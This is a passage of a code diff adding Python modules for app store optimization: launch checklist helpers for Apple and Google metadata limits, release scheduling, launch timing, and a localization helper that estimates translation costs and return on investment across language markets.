def _validate_apple_compliance(
|
||||
self,
|
||||
app_data: Dict[str, Any],
|
||||
validation_results: Dict[str, Any]
|
||||
) -> None:
|
||||
"""Validate Apple App Store compliance."""
|
||||
# Check for required fields
|
||||
if not app_data.get('privacy_policy_url'):
|
||||
validation_results['errors'].append("Privacy Policy URL is required")
|
||||
|
||||
if not app_data.get('app_icon'):
|
||||
validation_results['errors'].append("App icon (1024x1024px) is required")
|
||||
|
||||
# Check metadata character limits
|
||||
title = app_data.get('title', '')
|
||||
if len(title) > 30:
|
||||
validation_results['errors'].append(f"Title exceeds 30 characters ({len(title)})")
|
||||
|
||||
# Warnings for best practices
|
||||
subtitle = app_data.get('subtitle', '')
|
||||
if not subtitle:
|
||||
validation_results['warnings'].append("Subtitle is empty - consider adding for better discoverability")
|
||||
|
||||
keywords = app_data.get('keywords', '')
|
||||
if len(keywords) < 80:
|
||||
validation_results['warnings'].append(
|
||||
f"Keywords field underutilized ({len(keywords)}/100 chars) - add more keywords"
|
||||
)
|
||||
|
||||
def _validate_google_compliance(
|
||||
self,
|
||||
app_data: Dict[str, Any],
|
||||
validation_results: Dict[str, Any]
|
||||
) -> None:
|
||||
"""Validate Google Play Store compliance."""
|
||||
# Check for required fields
|
||||
if not app_data.get('privacy_policy_url'):
|
||||
validation_results['errors'].append("Privacy Policy URL is required")
|
||||
|
||||
if not app_data.get('feature_graphic'):
|
||||
validation_results['errors'].append("Feature graphic (1024x500px) is required")
|
||||
|
||||
# Check metadata character limits
|
||||
title = app_data.get('title', '')
|
||||
if len(title) > 50:
|
||||
validation_results['errors'].append(f"Title exceeds 50 characters ({len(title)})")
|
||||
|
||||
short_desc = app_data.get('short_description', '')
|
||||
if len(short_desc) > 80:
|
||||
validation_results['errors'].append(f"Short description exceeds 80 characters ({len(short_desc)})")
|
||||
|
||||
# Warnings
|
||||
if not short_desc:
|
||||
validation_results['warnings'].append("Short description is empty")
|
||||
|
||||
def _calculate_next_versions(
|
||||
self,
|
||||
current_version: str,
|
||||
update_frequency: str,
|
||||
feature_count: int
|
||||
) -> List[str]:
|
||||
"""Calculate next version numbers."""
|
||||
# Parse current version (assume semantic versioning)
|
||||
parts = current_version.split('.')
|
||||
major, minor, patch = int(parts[0]), int(parts[1]), int(parts[2] if len(parts) > 2 else 0)
|
||||
|
||||
versions = []
|
||||
for i in range(feature_count):
|
||||
if update_frequency == 'weekly':
|
||||
patch += 1
|
||||
elif update_frequency == 'biweekly':
|
||||
patch += 1
|
||||
elif update_frequency == 'monthly':
|
||||
minor += 1
|
||||
patch = 0
|
||||
else: # quarterly
|
||||
minor += 1
|
||||
patch = 0
|
||||
|
||||
versions.append(f"{major}.{minor}.{patch}")
|
||||
|
||||
return versions
|
||||
|
||||
def _distribute_features(
|
||||
self,
|
||||
features: List[str],
|
||||
versions: List[str]
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Distribute features across versions."""
|
||||
features_per_version = max(1, len(features) // len(versions))
|
||||
|
||||
schedule = []
|
||||
for i, version in enumerate(versions):
|
||||
start_idx = i * features_per_version
|
||||
end_idx = start_idx + features_per_version if i < len(versions) - 1 else len(features)
|
||||
|
||||
schedule.append({
|
||||
'version': version,
|
||||
'features': features[start_idx:end_idx],
|
||||
'release_priority': 'high' if i == 0 else ('medium' if i < len(versions) // 2 else 'low')
|
||||
})
|
||||
|
||||
return schedule
|
||||
|
||||
def _generate_whats_new_template(self, version_data: Dict[str, Any]) -> Dict[str, str]:
|
||||
"""Generate What's New template for version."""
|
||||
features_list = '\n'.join([f"• {feature}" for feature in version_data['features']])
|
||||
|
||||
template = f"""Version {version_data['version']}
|
||||
|
||||
{features_list}
|
||||
|
||||
We're constantly improving your experience. Thanks for using [App Name]!
|
||||
|
||||
Have feedback? Contact us at support@[company].com"""
|
||||
|
||||
return {
|
||||
'version': version_data['version'],
|
||||
'template': template
|
||||
}
|
||||
|
||||
def _generate_update_recommendations(self, update_frequency: str) -> List[str]:
|
||||
"""Generate recommendations for update strategy."""
|
||||
recommendations = []
|
||||
|
||||
if update_frequency == 'weekly':
|
||||
recommendations.append("Weekly updates show active development but ensure quality doesn't suffer")
|
||||
elif update_frequency == 'monthly':
|
||||
recommendations.append("Monthly updates are optimal for most apps - balance features and stability")
|
||||
|
||||
recommendations.extend([
|
||||
"Include bug fixes in every update",
|
||||
"Update 'What's New' section with each release",
|
||||
"Respond to reviews mentioning fixed issues"
|
||||
])
|
||||
|
||||
return recommendations
|
||||
|
||||
def _recommend_day_of_week(self, app_category: str) -> Dict[str, Any]:
|
||||
"""Recommend best day of week to launch."""
|
||||
# General recommendations based on category
|
||||
if app_category.lower() in ['games', 'entertainment']:
|
||||
return {
|
||||
'recommended_day': 'Thursday',
|
||||
'rationale': 'People download entertainment apps before weekend'
|
||||
}
|
||||
elif app_category.lower() in ['productivity', 'business']:
|
||||
return {
|
||||
'recommended_day': 'Tuesday',
|
||||
'rationale': 'Business users most active mid-week'
|
||||
}
|
||||
else:
|
||||
return {
|
||||
'recommended_day': 'Wednesday',
|
||||
'rationale': 'Mid-week provides good balance and review potential'
|
||||
}
|
||||
|
||||
def _recommend_seasonal_timing(self, app_category: str, current_date: str) -> Dict[str, Any]:
|
||||
"""Recommend seasonal timing considerations."""
|
||||
current_dt = datetime.strptime(current_date, '%Y-%m-%d')
|
||||
month = current_dt.month
|
||||
|
||||
# Avoid certain periods
|
||||
avoid_periods = []
|
||||
if month == 12:
|
||||
avoid_periods.append("Late December - low user engagement during holidays")
|
||||
if month in [7, 8]:
|
||||
avoid_periods.append("Summer months - some categories see lower engagement")
|
||||
|
||||
# Recommend periods
|
||||
good_periods = []
|
||||
if month in [1, 9]:
|
||||
good_periods.append("New Year/Back-to-school - high user engagement")
|
||||
if month in [10, 11]:
|
||||
good_periods.append("Pre-holiday season - good for shopping/gift apps")
|
||||
|
||||
return {
|
||||
'current_month': month,
|
||||
'avoid_periods': avoid_periods,
|
||||
'good_periods': good_periods
|
||||
}
|
||||
|
||||
def _analyze_competitive_timing(self, app_category: str) -> Dict[str, str]:
|
||||
"""Analyze competitive timing considerations."""
|
||||
return {
|
||||
'recommendation': 'Research competitor launch schedules in your category',
|
||||
'strategy': 'Avoid launching same week as major competitor updates'
|
||||
}
|
||||
|
||||
def _calculate_optimal_dates(
|
||||
self,
|
||||
current_date: str,
|
||||
day_rec: Dict[str, Any],
|
||||
seasonal_rec: Dict[str, Any]
|
||||
) -> List[str]:
|
||||
"""Calculate optimal launch dates."""
|
||||
current_dt = datetime.strptime(current_date, '%Y-%m-%d')
|
||||
|
||||
# Find next occurrence of recommended day
|
||||
target_day = day_rec['recommended_day']
|
||||
days_map = {'Monday': 0, 'Tuesday': 1, 'Wednesday': 2, 'Thursday': 3, 'Friday': 4}
|
||||
target_day_num = days_map.get(target_day, 2)
|
||||
|
||||
days_ahead = (target_day_num - current_dt.weekday()) % 7
|
||||
if days_ahead == 0:
|
||||
days_ahead = 7
|
||||
|
||||
next_target_date = current_dt + timedelta(days=days_ahead)
|
||||
|
||||
optimal_dates = [
|
||||
next_target_date.strftime('%Y-%m-%d'),
|
||||
(next_target_date + timedelta(days=7)).strftime('%Y-%m-%d'),
|
||||
(next_target_date + timedelta(days=14)).strftime('%Y-%m-%d')
|
||||
]
|
||||
|
||||
return optimal_dates
|
||||
|
||||
def _generate_timing_recommendation(
|
||||
self,
|
||||
optimal_dates: List[str],
|
||||
seasonal_rec: Dict[str, Any]
|
||||
) -> str:
|
||||
"""Generate final timing recommendation."""
|
||||
if seasonal_rec['avoid_periods']:
|
||||
return f"Consider launching in {optimal_dates[1]} to avoid {seasonal_rec['avoid_periods'][0]}"
|
||||
elif seasonal_rec['good_periods']:
|
||||
return f"Launch on {optimal_dates[0]} to capitalize on {seasonal_rec['good_periods'][0]}"
|
||||
else:
|
||||
return f"Recommended launch date: {optimal_dates[0]}"
|
||||
|
||||
def _identify_seasonal_opportunities(
|
||||
self,
|
||||
app_category: str,
|
||||
current_month: int
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Identify seasonal opportunities for category."""
|
||||
opportunities = []
|
||||
|
||||
# Universal opportunities
|
||||
if current_month == 1:
|
||||
opportunities.append({
|
||||
'event': 'New Year Resolutions',
|
||||
'dates': 'January 1-31',
|
||||
'relevance': 'high' if app_category.lower() in ['health', 'fitness', 'productivity'] else 'medium'
|
||||
})
|
||||
|
||||
if current_month in [11, 12]:
|
||||
opportunities.append({
|
||||
'event': 'Holiday Shopping Season',
|
||||
'dates': 'November-December',
|
||||
'relevance': 'high' if app_category.lower() in ['shopping', 'gifts'] else 'low'
|
||||
})
|
||||
|
||||
# Category-specific
|
||||
if app_category.lower() == 'education' and current_month in [8, 9]:
|
||||
opportunities.append({
|
||||
'event': 'Back to School',
|
||||
'dates': 'August-September',
|
||||
'relevance': 'high'
|
||||
})
|
||||
|
||||
return opportunities
|
||||
|
||||
def _generate_seasonal_campaign(self, opportunity: Dict[str, Any]) -> Dict[str, Any]:
|
||||
"""Generate campaign idea for seasonal opportunity."""
|
||||
return {
|
||||
'event': opportunity['event'],
|
||||
'campaign_idea': f"Create themed visuals and messaging for {opportunity['event']}",
|
||||
'metadata_updates': 'Update app description and screenshots with seasonal themes',
|
||||
'promotion_strategy': 'Consider limited-time features or discounts'
|
||||
}
|
||||
|
||||
def _create_seasonal_timeline(self, campaigns: List[Dict[str, Any]]) -> List[str]:
|
||||
"""Create implementation timeline for campaigns."""
|
||||
return [
|
||||
f"30 days before: Plan {campaign['event']} campaign strategy"
|
||||
for campaign in campaigns
|
||||
]
|
||||
|
||||
|
||||
def generate_launch_checklist(
|
||||
platform: str,
|
||||
app_info: Dict[str, Any],
|
||||
launch_date: Optional[str] = None
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to generate launch checklist.
|
||||
|
||||
Args:
|
||||
platform: Platform ('apple', 'google', or 'both')
|
||||
app_info: App information
|
||||
launch_date: Target launch date
|
||||
|
||||
Returns:
|
||||
Complete launch checklist
|
||||
"""
|
||||
generator = LaunchChecklistGenerator(platform)
|
||||
return generator.generate_prelaunch_checklist(app_info, launch_date)
|
||||
@ -0,0 +1,588 @@
|
||||
"""
|
||||
Localization helper module for App Store Optimization.
|
||||
Manages multi-language ASO optimization strategies.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional, Tuple
|
||||
|
||||
|
||||
class LocalizationHelper:
|
||||
"""Helps manage multi-language ASO optimization."""
|
||||
|
||||
# Priority markets by language (based on app store revenue and user base)
|
||||
PRIORITY_MARKETS = {
|
||||
'tier_1': [
|
||||
{'language': 'en-US', 'market': 'United States', 'revenue_share': 0.25},
|
||||
{'language': 'zh-CN', 'market': 'China', 'revenue_share': 0.20},
|
||||
{'language': 'ja-JP', 'market': 'Japan', 'revenue_share': 0.10},
|
||||
{'language': 'de-DE', 'market': 'Germany', 'revenue_share': 0.08},
|
||||
{'language': 'en-GB', 'market': 'United Kingdom', 'revenue_share': 0.06}
|
||||
],
|
||||
'tier_2': [
|
||||
{'language': 'fr-FR', 'market': 'France', 'revenue_share': 0.05},
|
||||
{'language': 'ko-KR', 'market': 'South Korea', 'revenue_share': 0.05},
|
||||
{'language': 'es-ES', 'market': 'Spain', 'revenue_share': 0.03},
|
||||
{'language': 'it-IT', 'market': 'Italy', 'revenue_share': 0.03},
|
||||
{'language': 'pt-BR', 'market': 'Brazil', 'revenue_share': 0.03}
|
||||
],
|
||||
'tier_3': [
|
||||
{'language': 'ru-RU', 'market': 'Russia', 'revenue_share': 0.02},
|
||||
{'language': 'es-MX', 'market': 'Mexico', 'revenue_share': 0.02},
|
||||
{'language': 'nl-NL', 'market': 'Netherlands', 'revenue_share': 0.02},
|
||||
{'language': 'sv-SE', 'market': 'Sweden', 'revenue_share': 0.01},
|
||||
{'language': 'pl-PL', 'market': 'Poland', 'revenue_share': 0.01}
|
||||
]
|
||||
}
|
||||
|
||||
# Character limit multipliers by language (some languages need more/less space)
|
||||
CHAR_MULTIPLIERS = {
|
||||
'en': 1.0,
|
||||
'zh': 0.6, # Chinese characters are more compact
|
||||
'ja': 0.7, # Japanese uses kanji
|
||||
'ko': 0.8, # Korean is relatively compact
|
||||
'de': 1.3, # German words are typically longer
|
||||
'fr': 1.2, # French tends to be longer
|
||||
'es': 1.1, # Spanish slightly longer
|
||||
'pt': 1.1, # Portuguese similar to Spanish
|
||||
'ru': 1.1, # Russian similar length
|
||||
'ar': 1.0, # Arabic varies
|
||||
'it': 1.1 # Italian similar to Spanish
|
||||
}
|
||||
|
||||
def __init__(self, app_category: str = 'general'):
|
||||
"""
|
||||
Initialize localization helper.
|
||||
|
||||
Args:
|
||||
app_category: App category to prioritize relevant markets
|
||||
"""
|
||||
self.app_category = app_category
|
||||
self.localization_plans = []
|
||||
|
||||
def identify_target_markets(
|
||||
self,
|
||||
current_market: str = 'en-US',
|
||||
budget_level: str = 'medium',
|
||||
target_market_count: int = 5
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Recommend priority markets for localization.
|
||||
|
||||
Args:
|
||||
current_market: Current/primary market
|
||||
budget_level: 'low', 'medium', or 'high'
|
||||
target_market_count: Number of markets to target
|
||||
|
||||
Returns:
|
||||
Prioritized market recommendations
|
||||
"""
|
||||
# Determine tier priorities based on budget
|
||||
if budget_level == 'low':
|
||||
priority_tiers = ['tier_1']
|
||||
max_markets = min(target_market_count, 3)
|
||||
elif budget_level == 'medium':
|
||||
priority_tiers = ['tier_1', 'tier_2']
|
||||
max_markets = min(target_market_count, 8)
|
||||
else: # high budget
|
||||
priority_tiers = ['tier_1', 'tier_2', 'tier_3']
|
||||
max_markets = target_market_count
|
||||
|
||||
# Collect markets from priority tiers
|
||||
recommended_markets = []
|
||||
for tier in priority_tiers:
|
||||
for market in self.PRIORITY_MARKETS[tier]:
|
||||
if market['language'] != current_market:
|
||||
recommended_markets.append({
|
||||
**market,
|
||||
'tier': tier,
|
||||
'estimated_translation_cost': self._estimate_translation_cost(
|
||||
market['language']
|
||||
)
|
||||
})
|
||||
|
||||
# Sort by revenue share and limit
|
||||
recommended_markets.sort(key=lambda x: x['revenue_share'], reverse=True)
|
||||
recommended_markets = recommended_markets[:max_markets]
|
||||
|
||||
# Calculate potential ROI
|
||||
total_potential_revenue_share = sum(m['revenue_share'] for m in recommended_markets)
|
||||
|
||||
return {
|
||||
'recommended_markets': recommended_markets,
|
||||
'total_markets': len(recommended_markets),
|
||||
'estimated_total_revenue_lift': f"{total_potential_revenue_share*100:.1f}%",
|
||||
'estimated_cost': self._estimate_total_localization_cost(recommended_markets),
|
||||
'implementation_priority': self._prioritize_implementation(recommended_markets)
|
||||
}
|
||||
|
||||
def translate_metadata(
|
||||
self,
|
||||
source_metadata: Dict[str, str],
|
||||
source_language: str,
|
||||
target_language: str,
|
||||
platform: str = 'apple'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Generate localized metadata with character limit considerations.
|
||||
|
||||
Args:
|
||||
source_metadata: Original metadata (title, description, etc.)
|
||||
source_language: Source language code (e.g., 'en')
|
||||
target_language: Target language code (e.g., 'es')
|
||||
platform: 'apple' or 'google'
|
||||
|
||||
Returns:
|
||||
Localized metadata with character limit validation
|
||||
"""
|
||||
# Get character multiplier
|
||||
target_lang_code = target_language.split('-')[0]
|
||||
char_multiplier = self.CHAR_MULTIPLIERS.get(target_lang_code, 1.0)
|
||||
|
||||
# Platform-specific limits
|
||||
if platform == 'apple':
|
||||
limits = {'title': 30, 'subtitle': 30, 'description': 4000, 'keywords': 100}
|
||||
else:
|
||||
limits = {'title': 50, 'short_description': 80, 'description': 4000}
|
||||
|
||||
localized_metadata = {}
|
||||
warnings = []
|
||||
|
||||
for field, text in source_metadata.items():
|
||||
if field not in limits:
|
||||
continue
|
||||
|
||||
# Estimate target length
|
||||
estimated_length = int(len(text) * char_multiplier)
|
||||
limit = limits[field]
|
||||
|
||||
localized_metadata[field] = {
|
||||
'original_text': text,
|
||||
'original_length': len(text),
|
||||
'estimated_target_length': estimated_length,
|
||||
'character_limit': limit,
|
||||
'fits_within_limit': estimated_length <= limit,
|
||||
'translation_notes': self._get_translation_notes(
|
||||
field,
|
||||
target_language,
|
||||
estimated_length,
|
||||
limit
|
||||
)
|
||||
}
|
||||
|
||||
if estimated_length > limit:
|
||||
warnings.append(
|
||||
f"{field}: Estimated length ({estimated_length}) may exceed limit ({limit}) - "
|
||||
f"condensing may be required"
|
||||
)
|
||||
|
||||
return {
|
||||
'source_language': source_language,
|
||||
'target_language': target_language,
|
||||
'platform': platform,
|
||||
'localized_fields': localized_metadata,
|
||||
'character_multiplier': char_multiplier,
|
||||
'warnings': warnings,
|
||||
'recommendations': self._generate_translation_recommendations(
|
||||
target_language,
|
||||
warnings
|
||||
)
|
||||
}
|
||||
|
||||
def adapt_keywords(
|
||||
self,
|
||||
source_keywords: List[str],
|
||||
source_language: str,
|
||||
target_language: str,
|
||||
target_market: str
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Adapt keywords for target market (not just direct translation).
|
||||
|
||||
Args:
|
||||
source_keywords: Original keywords
|
||||
source_language: Source language code
|
||||
target_language: Target language code
|
||||
target_market: Target market (e.g., 'France', 'Japan')
|
||||
|
||||
Returns:
|
||||
Adapted keyword recommendations
|
||||
"""
|
||||
# Cultural adaptation considerations
|
||||
cultural_notes = self._get_cultural_keyword_considerations(target_market)
|
||||
|
||||
# Search behavior differences
|
||||
search_patterns = self._get_search_patterns(target_market)
|
||||
|
||||
adapted_keywords = []
|
||||
for keyword in source_keywords:
|
||||
adapted_keywords.append({
|
||||
'source_keyword': keyword,
|
||||
'adaptation_strategy': self._determine_adaptation_strategy(
|
||||
keyword,
|
||||
target_market
|
||||
),
|
||||
'cultural_considerations': cultural_notes.get(keyword, []),
|
||||
'priority': 'high' if keyword in source_keywords[:3] else 'medium'
|
||||
})
|
||||
|
||||
return {
|
||||
'source_language': source_language,
|
||||
'target_language': target_language,
|
||||
'target_market': target_market,
|
||||
'adapted_keywords': adapted_keywords,
|
||||
'search_behavior_notes': search_patterns,
|
||||
'recommendations': [
|
||||
'Use native speakers for keyword research',
|
||||
'Test keywords with local users before finalizing',
|
||||
'Consider local competitors\' keyword strategies',
|
||||
'Monitor search trends in target market'
|
||||
]
|
||||
}
|
||||
|
||||
def validate_translations(
|
||||
self,
|
||||
translated_metadata: Dict[str, str],
|
||||
target_language: str,
|
||||
platform: str = 'apple'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Validate translated metadata for character limits and quality.
|
||||
|
||||
Args:
|
||||
translated_metadata: Translated text fields
|
||||
target_language: Target language code
|
||||
platform: 'apple' or 'google'
|
||||
|
||||
Returns:
|
||||
Validation report
|
||||
"""
|
||||
# Platform limits
|
||||
if platform == 'apple':
|
||||
limits = {'title': 30, 'subtitle': 30, 'description': 4000, 'keywords': 100}
|
||||
else:
|
||||
limits = {'title': 50, 'short_description': 80, 'description': 4000}
|
||||
|
||||
validation_results = {
|
||||
'is_valid': True,
|
||||
'field_validations': {},
|
||||
'errors': [],
|
||||
'warnings': []
|
||||
}
|
||||
|
||||
for field, text in translated_metadata.items():
|
||||
if field not in limits:
|
||||
continue
|
||||
|
||||
actual_length = len(text)
|
||||
limit = limits[field]
|
||||
is_within_limit = actual_length <= limit
|
||||
|
||||
validation_results['field_validations'][field] = {
|
||||
'text': text,
|
||||
'length': actual_length,
|
||||
'limit': limit,
|
||||
'is_valid': is_within_limit,
|
||||
'usage_percentage': round((actual_length / limit) * 100, 1)
|
||||
}
|
||||
|
||||
if not is_within_limit:
|
||||
validation_results['is_valid'] = False
|
||||
validation_results['errors'].append(
|
||||
f"{field} exceeds limit: {actual_length}/{limit} characters"
|
||||
)
|
||||
|
||||
# Quality checks
|
||||
quality_issues = self._check_translation_quality(
|
||||
translated_metadata,
|
||||
target_language
|
||||
)
|
||||
|
||||
validation_results['quality_checks'] = quality_issues
|
||||
|
||||
if quality_issues:
|
||||
validation_results['warnings'].extend(
|
||||
[f"Quality issue: {issue}" for issue in quality_issues]
|
||||
)
|
||||
|
||||
return validation_results
|
||||
|
||||
def calculate_localization_roi(
|
||||
self,
|
||||
target_markets: List[str],
|
||||
current_monthly_downloads: int,
|
||||
localization_cost: float,
|
||||
expected_lift_percentage: float = 0.15
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Estimate ROI of localization investment.
|
||||
|
||||
Args:
|
||||
target_markets: List of market codes
|
||||
current_monthly_downloads: Current monthly downloads
|
||||
localization_cost: Total cost to localize
|
||||
expected_lift_percentage: Expected download increase (default 15%)
|
||||
|
||||
Returns:
|
||||
ROI analysis
|
||||
"""
|
||||
# Estimate market-specific lift
|
||||
market_data = []
|
||||
total_expected_lift = 0
|
||||
|
||||
for market_code in target_markets:
|
||||
# Find market in priority lists
|
||||
market_info = None
|
||||
for tier_name, markets in self.PRIORITY_MARKETS.items():
|
||||
for m in markets:
|
||||
if m['language'] == market_code:
|
||||
market_info = m
|
||||
break
|
||||
|
||||
if not market_info:
|
||||
continue
|
||||
|
||||
# Estimate downloads from this market
|
||||
market_downloads = int(current_monthly_downloads * market_info['revenue_share'])
|
||||
expected_increase = int(market_downloads * expected_lift_percentage)
|
||||
total_expected_lift += expected_increase
|
||||
|
||||
market_data.append({
|
||||
'market': market_info['market'],
|
||||
'current_monthly_downloads': market_downloads,
|
||||
'expected_increase': expected_increase,
|
||||
'revenue_potential': market_info['revenue_share']
|
||||
})
|
||||
|
||||
# Calculate payback period (assuming $2 revenue per download)
|
||||
revenue_per_download = 2.0
|
||||
monthly_additional_revenue = total_expected_lift * revenue_per_download
|
||||
payback_months = (localization_cost / monthly_additional_revenue) if monthly_additional_revenue > 0 else float('inf')
|
||||
|
||||
return {
|
||||
'markets_analyzed': len(market_data),
|
||||
'market_breakdown': market_data,
|
||||
'total_expected_monthly_lift': total_expected_lift,
|
||||
'expected_monthly_revenue_increase': f"${monthly_additional_revenue:,.2f}",
|
||||
'localization_cost': f"${localization_cost:,.2f}",
|
||||
'payback_period_months': round(payback_months, 1) if payback_months != float('inf') else 'N/A',
|
||||
'annual_roi': f"{((monthly_additional_revenue * 12 - localization_cost) / localization_cost * 100):.1f}%" if payback_months != float('inf') else 'Negative',
|
||||
'recommendation': self._generate_roi_recommendation(payback_months)
|
||||
}
|
||||
|
||||
def _estimate_translation_cost(self, language: str) -> Dict[str, float]:
|
||||
"""Estimate translation cost for a language."""
|
||||
# Base cost per word (professional translation)
|
||||
base_cost_per_word = 0.12
|
||||
|
||||
# Language-specific multipliers
|
||||
multipliers = {
|
||||
'zh-CN': 1.5, # Chinese requires specialist
|
||||
'ja-JP': 1.5, # Japanese requires specialist
|
||||
'ko-KR': 1.3,
|
||||
'ar-SA': 1.4, # Arabic (right-to-left)
|
||||
'default': 1.0
|
||||
}
|
||||
|
||||
multiplier = multipliers.get(language, multipliers['default'])
|
||||
|
||||
# Typical word counts for app store metadata
|
||||
typical_word_counts = {
|
||||
'title': 5,
|
||||
'subtitle': 5,
|
||||
'description': 300,
|
||||
'keywords': 20,
|
||||
'screenshots': 50 # Caption text
|
||||
}
|
||||
|
||||
total_words = sum(typical_word_counts.values())
|
||||
estimated_cost = total_words * base_cost_per_word * multiplier
|
||||
|
||||
return {
|
||||
'cost_per_word': base_cost_per_word * multiplier,
|
||||
'total_words': total_words,
|
||||
'estimated_cost': round(estimated_cost, 2)
|
||||
}
|
||||
|
||||
def _estimate_total_localization_cost(self, markets: List[Dict[str, Any]]) -> str:
|
||||
"""Estimate total cost for multiple markets."""
|
||||
total = sum(m['estimated_translation_cost']['estimated_cost'] for m in markets)
|
||||
return f"${total:,.2f}"
|
||||
|
||||
def _prioritize_implementation(self, markets: List[Dict[str, Any]]) -> List[Dict[str, str]]:
|
||||
"""Create phased implementation plan."""
|
||||
phases = []
|
||||
|
||||
# Phase 1: Top revenue markets
|
||||
phase_1 = [m for m in markets[:3]]
|
||||
if phase_1:
|
||||
phases.append({
|
||||
'phase': 'Phase 1 (First 30 days)',
|
||||
'markets': ', '.join([m['market'] for m in phase_1]),
|
||||
'rationale': 'Highest revenue potential markets'
|
||||
})
|
||||
|
||||
# Phase 2: Remaining tier 1 and top tier 2
|
||||
phase_2 = [m for m in markets[3:6]]
|
||||
if phase_2:
|
||||
phases.append({
|
||||
'phase': 'Phase 2 (Days 31-60)',
|
||||
'markets': ', '.join([m['market'] for m in phase_2]),
|
||||
'rationale': 'Strong revenue markets with good ROI'
|
||||
})
|
||||
|
||||
# Phase 3: Remaining markets
|
||||
phase_3 = [m for m in markets[6:]]
|
||||
if phase_3:
|
||||
phases.append({
|
||||
'phase': 'Phase 3 (Days 61-90)',
|
||||
'markets': ', '.join([m['market'] for m in phase_3]),
|
||||
'rationale': 'Complete global coverage'
|
||||
})
|
||||
|
||||
return phases
|
||||
|
||||
def _get_translation_notes(
|
||||
self,
|
||||
field: str,
|
||||
target_language: str,
|
||||
estimated_length: int,
|
||||
limit: int
|
||||
) -> List[str]:
|
||||
"""Get translation-specific notes for field."""
|
||||
notes = []
|
||||
|
||||
if estimated_length > limit:
|
||||
notes.append(f"Condensing required - aim for {limit - 10} characters to allow buffer")
|
||||
|
||||
if field == 'title' and target_language.startswith('zh'):
|
||||
notes.append("Chinese characters convey more meaning - may need fewer characters")
|
||||
|
||||
if field == 'keywords' and target_language.startswith('de'):
|
||||
notes.append("German compound words may be longer - prioritize shorter keywords")
|
||||
|
||||
return notes
|
||||
|
||||
def _generate_translation_recommendations(
|
||||
self,
|
||||
target_language: str,
|
||||
warnings: List[str]
|
||||
) -> List[str]:
|
||||
"""Generate translation recommendations."""
|
||||
recommendations = [
|
||||
"Use professional native speakers for translation",
|
||||
"Test translations with local users before finalizing"
|
||||
]
|
||||
|
||||
if warnings:
|
||||
recommendations.append("Work with translator to condense text while preserving meaning")
|
||||
|
||||
if target_language.startswith('zh') or target_language.startswith('ja'):
|
||||
recommendations.append("Consider cultural context and local idioms")
|
||||
|
||||
return recommendations
|
||||
|
||||
def _get_cultural_keyword_considerations(self, target_market: str) -> Dict[str, List[str]]:
|
||||
"""Get cultural considerations for keywords by market."""
|
||||
# Simplified example - real implementation would be more comprehensive
|
||||
considerations = {
|
||||
'China': ['Avoid politically sensitive terms', 'Consider local alternatives to blocked services'],
|
||||
'Japan': ['Honorific language important', 'Technical terms often use katakana'],
|
||||
'Germany': ['Privacy and security terms resonate', 'Efficiency and quality valued'],
|
||||
'France': ['French language protection laws', 'Prefer French terms over English'],
|
||||
'default': ['Research local search behavior', 'Test with native speakers']
|
||||
}
|
||||
|
||||
return considerations.get(target_market, considerations['default'])
|
||||
|
||||
def _get_search_patterns(self, target_market: str) -> List[str]:
|
||||
"""Get search pattern notes for market."""
|
||||
patterns = {
|
||||
'China': ['Use both simplified characters and romanization', 'Brand names often romanized'],
|
||||
'Japan': ['Mix of kanji, hiragana, and katakana', 'English words common in tech'],
|
||||
'Germany': ['Compound words common', 'Specific technical terminology'],
|
||||
'default': ['Research local search trends', 'Monitor competitor keywords']
|
||||
}
|
||||
|
||||
return patterns.get(target_market, patterns['default'])
|
||||
|
||||
def _determine_adaptation_strategy(self, keyword: str, target_market: str) -> str:
|
||||
"""Determine how to adapt keyword for market."""
|
||||
# Simplified logic
|
||||
if target_market in ['China', 'Japan', 'Korea']:
|
||||
return 'full_localization' # Complete translation needed
|
||||
elif target_market in ['Germany', 'France', 'Spain']:
|
||||
return 'adapt_and_translate' # Some adaptation needed
|
||||
else:
|
||||
return 'direct_translation' # Direct translation usually sufficient
|
||||
|
||||
def _check_translation_quality(
|
||||
self,
|
||||
translated_metadata: Dict[str, str],
|
||||
target_language: str
|
||||
) -> List[str]:
|
||||
"""Basic quality checks for translations."""
|
||||
issues = []
|
||||
|
||||
# Check for untranslated placeholders
|
||||
for field, text in translated_metadata.items():
|
||||
if '[' in text or '{' in text or 'TODO' in text.upper():
|
||||
issues.append(f"{field} contains placeholder text")
|
||||
|
||||
# Check for excessive punctuation
|
||||
for field, text in translated_metadata.items():
|
||||
if text.count('!') > 3:
|
||||
issues.append(f"{field} has excessive exclamation marks")
|
||||
|
||||
return issues
|
||||
|
||||
def _generate_roi_recommendation(self, payback_months: float) -> str:
|
||||
"""Generate ROI recommendation."""
|
||||
if payback_months <= 3:
|
||||
return "Excellent ROI - proceed immediately"
|
||||
elif payback_months <= 6:
|
||||
return "Good ROI - recommended investment"
|
||||
elif payback_months <= 12:
|
||||
return "Moderate ROI - consider if strategic market"
|
||||
else:
|
||||
return "Low ROI - reconsider or focus on higher-priority markets first"
|
||||
|
||||
|
||||
def plan_localization_strategy(
|
||||
current_market: str,
|
||||
budget_level: str,
|
||||
monthly_downloads: int
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to plan localization strategy.
|
||||
|
||||
Args:
|
||||
current_market: Current market code
|
||||
budget_level: Budget level
|
||||
monthly_downloads: Current monthly downloads
|
||||
|
||||
Returns:
|
||||
Complete localization plan
|
||||
"""
|
||||
helper = LocalizationHelper()
|
||||
|
||||
target_markets = helper.identify_target_markets(
|
||||
current_market=current_market,
|
||||
budget_level=budget_level
|
||||
)
|
||||
|
||||
# Extract market codes
|
||||
market_codes = [m['language'] for m in target_markets['recommended_markets']]
|
||||
|
||||
# Calculate ROI
|
||||
estimated_cost = float(target_markets['estimated_cost'].replace('$', '').replace(',', ''))
|
||||
|
||||
roi_analysis = helper.calculate_localization_roi(
|
||||
market_codes,
|
||||
monthly_downloads,
|
||||
estimated_cost
|
||||
)
|
||||
|
||||
return {
|
||||
'target_markets': target_markets,
|
||||
'roi_analysis': roi_analysis
|
||||
}
|
||||
581
packages/llm/skills/app-store-optimization/metadata_optimizer.py
Normal file
581
